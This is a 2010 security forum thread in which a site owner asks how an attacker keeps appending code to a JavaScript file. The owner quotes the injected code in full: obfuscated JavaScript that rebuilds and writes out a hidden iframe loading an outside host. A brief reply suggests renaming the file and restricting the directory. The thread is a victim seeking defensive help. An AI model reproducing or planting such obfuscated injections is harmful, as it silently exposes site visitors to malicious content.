|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 63
Members: 0
Total: 63
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
A file on my site is vulnerable. Please help. |
|
Posted: Sun Mar 07, 2010 8:19 am |
|
|
hackturkey |
Beginner |
|
|
Joined: Mar 07, 2010 |
Posts: 1 |
|
|
|
|
|
|
|
Hi.
If anyone could help I would greatly appreciate it.
A javascript file on my site seems to be vulnerable to some sort of attack where the hacker is able to append an iframe to the bottom of the file. I've tried a few things such as changing permissions on the file however this has not helped. Please can someone offer any suggestions. I have researched this on google and have only found one relevant link here: http://www.vbulletin.com/forum/showthread.php?338741-vBulletin-Footer-SQL-Injection-Hack
The page that is being targeted is called cappuccino.js and this is the code is available here:
http://dragoninteractive.com/lib/j/cappuccino.js
This is the code the attacker is able to append to the script:
Code: | var _0x510763= ["\x77\x72\x69\x74\x65"]; var aBaBa=document; var acBBa = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg121.imagehacks.info%2Fimg121%2F103%2Fheader.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var cBccB = acBBa.replace(/XLMS9Q21/g,"s"); var BBcac = cBccB.replace(/LSM21ghk8/g,"o"); var cBcca = BBcac.replace(/JQ21KL#AZ/g,"e");aBaBa[_0x510763[0]](unescape(cBcca)); |
|
|
|
|
|
|
|
Re: A file on my site is vulnerable. Please help. |
|
Posted: Fri Mar 19, 2010 11:15 pm |
|
|
EluneZ |
Regular user |
|
|
Joined: Mar 16, 2010 |
Posts: 14 |
Location: Bulgaria |
|
|
|
|
|
|
Hehe funny, just change name of that script with another .
You said you are tried with htaccess file? I dont think so , or you are wrong something just restrict the DIR of the file .
EluneZ |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|